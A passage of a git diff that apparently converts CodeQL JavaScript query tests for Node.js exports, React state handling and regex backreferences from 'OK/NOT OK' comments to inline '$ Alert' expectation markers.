b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref index 6864d74ec268..5225f0d052a9 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref @@ -1 +1,2 @@ -NodeJS/InvalidExport.ql \ No newline at end of file +query: NodeJS/InvalidExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js index 091cf6fef202..bd8d05fcd03a 100644 --- a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js @@ -4,5 +4,5 @@ exports.checkOne = function(x) { var checkList = exports.checkList = function(xs) { for (var i=0; iHello {this.props.name}
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js index c790106ba3e1..4c87a1f8b0db 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name= "bar" + this.state.person.name= "bar" // $ Alert return
    Hello {this.props.name}
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js index 291e0044bb3c..e542b14ce357 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" + this.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js index 1b9da154358a..6297f138f002 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js @@ -1,7 +1,7 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" - this.state.person.name.last = "baz" + this.state.person.name.first = "bar" // $ Alert + this.state.person.name.last = "baz" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js index fafcb3600a52..0e112ccd74a7 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js @@ -3,7 +3,7 @@ var Hello = React.createClass({ render: function() { var that = this; - that.state.person.name.first = "bar" + that.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js index 9b88b1786b88..fc4e02c5368a 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = () => this.state.title = 'new title'; + this.updater = () => this.state.title = 'new title'; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js index 6393da58469f..23ce21fbca64 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = function(){this.state.title = 'new title';}; + this.updater = function(){this.state.title = 'new title';}; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref index bab216c48331..eed73b7bfa4c 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref @@ -1 +1,2 @@ -React/InconsistentStateUpdate.ql \ No newline at end of file +query: React/InconsistentStateUpdate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..0c73d7ef0772 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,73 +26,73 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK - }); + counter: this.state.foo + }); // $ Alert } } class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } } class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice - }); + foo: this.state.foo, + bar: this.state.bar // OK - ignored because it is safe in practice + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK - }); + foo: self.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref index dfa6c80426f6..9d1de0e203a6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref @@ -1 +1,2 @@ -React/UnsupportedStateUpdateInLifecycleMethod.ql \ No newline at end of file +query: React/UnsupportedStateUpdateInLifecycleMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..41dcc713ceb1 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
    } }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
    } @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
    } @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
    } }); @@ -97,7 +97,7 @@ React.createClass({ this.setState({}) }, render: function() { - this.indirectUpdate(); + this.indirectUpdate(); // $ Alert return
    } }); @@ -105,9 +105,9 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -115,9 +115,9 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected index fd0b9853a6ac..74825d5a26d8 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected @@ -1,7 +1,7 @@ -| issue7506.js:12:1:12:34 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | -| undefined.js:32:1:32:34 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. | undefined.js:35:9:35:57 | this.st ... yAccess | read | -| undefined.js:61:19:61:19 | {\\n r ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | -| unused.js:1:1:1:34 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | -| unused.js:27:1:27:34 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | +| issue7506.js:12:1:12:45 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | +| undefined.js:32:1:32:45 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. | undefined.js:35:9:35:57 | this.st ... yAccess | read | +| undefined.js:61:19:61:30 | { // $ ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | +| unused.js:1:1:1:45 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | +| unused.js:27:1:27:45 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref index 2b285a04cd8f..a767c2444b8d 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref @@ -1 +1,2 @@ -React/UnusedOrUndefinedStateProperty.ql \ No newline at end of file +query: React/UnusedOrUndefinedStateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,14 +1,14 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } @@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); -React.createClass({ +React.createClass({ // $ Alert render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
    ; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
    ; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } @@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

    Hello

    ; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } @@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return

    Hello

    ; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref index 3c5f29d2f914..0096b5fd9e9c 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref @@ -1 +1,2 @@ -RegExp/BackrefBeforeGroup.ql \ No newline at end of file +query: RegExp/BackrefBeforeGroup.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git 